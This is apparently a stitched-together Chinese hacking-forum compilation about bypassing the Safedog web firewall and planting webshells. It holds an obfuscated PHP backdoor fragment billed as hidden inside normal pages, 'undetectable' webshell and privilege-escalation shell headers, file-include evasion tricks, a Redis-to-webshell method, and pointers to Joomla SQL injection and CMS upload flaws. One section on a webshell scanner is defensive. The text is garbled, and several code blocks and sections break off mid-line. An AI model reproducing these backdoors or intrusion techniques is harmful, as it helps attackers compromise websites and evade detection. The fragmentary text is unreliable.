此时此刻怎能不打狗?

双十一不单单是程序猿的节日且更是安全狗的节日,三个月以前就说过挖到各种各样安全狗绕过方法了,一直没找到好的时间来发出来。那何不乘这个时候发出来让大家开心的过一个节日

极其隐蔽的pHp小马穿插在正常页面中

<?php
$pssddd="2b";//密码
if($_GET["hks"]==$pssddd){@set_time_limit(100);$slstss="fi"."le_"."ge"."t_c"."onten"."ts";$raworistr='

2015免杀一句话、免杀大马收集

测试过两个完美过安全狗,被狗咬的话就试试文件包含的方法

文件包含方法:

asp代码
<!--#include file="hack1996.txt"-->
php代码
<?php include 'hack1996.txt';  ?>
aspx代码
<code><!--#include file="hack1996.txt"--> </code >

"一句话"的艺术——简单的编码和变形绕过检测

2013122817573781043.jpg

发个免杀修改的aspx提权马5kikshell.aspx

<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%>
<%@ import Namespace="System.IO"%>
<%@ import Namespace="System.Diagnostics"%>
<%@ import Namespace="System.Data"%>
<%@ import Namespace="System.Management"%>
<%@ import Namespace="System.Data.OleDb"%>
<%@ import Namespace="Microsoft.Win32"%>
<%@ import Namespace="System.Net.Sockets" %>
<%@ import Namespace="System.Net" %>

redis写shell的小技巧

最近碰到一个redis未授权访问,想近各种办法最后终于成功了写了webshell,这里写下一点点小经验。

首先,写shell的基本方式,还是按照phithon发的文章,安全脉搏的《利用redis写webshell》

这种方法对于没有存多少数据的redis数据库来说还是很适用的,但是当数据库比较大时,就会遇到一些问题(比如本例中数据库下载下来大小约为200M,还算比较大的)。

首先就是这么大的数据量,里面不可避免会出现这样的字符串“<?”,php遇到这个字符串时就把后面的内容当php脚本解析了,自然会报错,不能运行,对于这个问题,没别的办法,只能找到出错的地方的键值,删掉,然后再写shell。


推荐个扫 webshell后门 webshell木马 一句话的asp程序

功能说明:
1.能查找后缀名为asp,asa,cdx,cer,aspx等木马
  如果目录下文件过多,容易脚本超时。

2.能查找IIS解析漏洞的文件,这些文件不一定是木马,需要手动查看
  比如"D:\WEBROOT\website\hack.asp\a.gif"或
  "D:\WEBROOT\website\hack.asp;.gif"一类的文件能查到

权5站点全站不可写拿webshell方法

看到一个站点,(此处忽略一万字)先爬虫一下。

使用这个工具

发现一个info目录很可疑,打开以后凭借我多年的日站经验、敏锐的观察力、超强的分析力; 断定这是WordPress
此博客程序没有什么好的漏洞,好用的XSS又需要管理员交互
于是使用以下脚本:


Joomla 3.2 – 3.4.4 无限制SQL注入漏洞

看到一个通杀 Joolma 3.2 到 3.4.4 版本的注入漏洞,可获得管理员权限,详细分析见此 Joomla SQL Injection Vulnerability Exploit Results in Full Administrative Access

注入点存在于 /administrator/components/com_contenthistory/models/history.php。原因是 populateState 函数没有对 list.select 进行过滤。

逐浪cms 2.4某处任意文件上传

/Plugins/swfFileUpload/UploadHandler.ashx
有一个全局过滤
1
asp_code.dll
class ZoomlaSecurityCenter